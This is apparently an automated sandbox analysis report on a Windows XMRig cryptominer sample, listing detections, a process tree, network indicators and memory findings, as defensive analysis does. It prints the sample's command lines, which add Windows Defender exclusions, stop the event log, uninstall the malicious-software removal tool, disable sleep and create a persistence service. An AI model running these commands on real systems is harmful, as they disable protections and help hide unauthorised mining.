Windows Analysis Report
12Jh49DCAj.exe

Overview

General Information

Sample name: 12Jh49DCAj.exe (renamed because the original name is a hash value)
Original sample name: 003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d.exe
Analysis ID: 1546361
MD5: a44c57ded5f0e75dd398f8bde8c83219
SHA1: b46a7f6d001c9e06b7dcc39a926130fb791f4663
SHA256: 003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d
Tags: exe, user-Chainskilabs

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 12Jh49DCAj.exe (PID: 3544 cmdline: "C:\Users\user\Desktop\12Jh49DCAj.exe" MD5: A44C57DED5F0E75DD398F8BDE8C83219)
    • powershell.exe (PID: 2020 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3520 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2404 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3620 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5920 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5896 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6664 cmdline: C:\Windows\system32\sc.exe delete "ODTUTVYC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6008 cmdline: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3108 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 280 cmdline: C:\Windows\system32\sc.exe start "ODTUTVYC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • jjlazghkkuth.exe (PID: 1600 cmdline: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe MD5: A44C57DED5F0E75DD398F8BDE8C83219)
    • powershell.exe (PID: 1444 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1880 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 2052 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6460 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6468 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3260 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 3384 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 5996 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author
00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Process Memory Space: explorer.exe PID: 3384 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2404, ProcessName: powercfg.exe

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2020, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2020, ProcessName: powershell.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "ODTUTVYC" binpath= "C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe" start= "auto", ProcessId: 6008, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2020, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5996, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\12Jh49DCAj.exe", ParentImage: C:\Users\user\Desktop\12Jh49DCAj.exe, ParentProcessId: 3544, ParentProcessName: 12Jh49DCAj.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 3108, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T20:11:20.574099+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49746 | TCP
2024-10-31T20:11:58.857779+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49952 | TCP

AV Detection

Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | ReversingLabs: Detection: 63%
Source: 12Jh49DCAj.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match | File source: 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3384, type: MEMORYSTR
Source: unknown | DNS query: name: xmr-eu1.nanopool.org
Source: 12Jh49DCAj.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe | Network Connect: 54.37.232.103 10343
Source: global traffic | TCP traffic: 192.168.2.6:49710 -> 54.37.232.103:10343
Source: Joe Sandbox View | IP Address: 54.37.232.103
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49746
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49952
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.cloudflare.com/origin_ca.crlC
Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: jjlazghkkuth.exe, 00000018.00000003.2166278619.00000209695D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 00000026.00000002.4576398328.0000000001960000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0

System Summary

Source: C:\Users\user\Desktop\12Jh49DCAj.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\12Jh49DCAj.exe | Code function: 0_2_00007FF6C5321394 NtAddBootEntry,0_2_00007FF6C5321394
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | Code function: 24_2_00007FF759BF1394 NtCreateProcessEx,24_2_00007FF759BF1394
Source: C:\Windows\System32\conhost.exe | Code function: 36_2_0000000140001394 NtCreateMutant,36_2_0000000140001394
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | File created: C:\Windows\TEMP\ovabrjmyzhdo.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_0htk1wp1.uea.ps1
Source: C:\Users\user\Desktop\12Jh49DCAj.exe | Code function: 0_2_00007FF6C5323B50
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | Code function: 24_2_00007FF759BF3B50
Source: C:\Windows\System32\conhost.exe | Code function: 36_2_0000000140003150
Source: C:\Windows\System32\conhost.exe | Code function: 36_2_00000001400026E0
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\ovabrjmyzhdo.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | Code function: String function: 00007FF759BF1394 appears 33 times
Source: C:\Users\user\Desktop\12Jh49DCAj.exe | Code function: String function: 00007FF6C5321394 appears 33 times
Source: classification engine | Classification label: mal100.spyw.evad.mine.winEXE@58/12@1/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6512:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5944:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzt5kz4g.cir.ps1
Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe | Process created: C:\Windows\explorer.exe
Source: 12Jh49DCAj.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
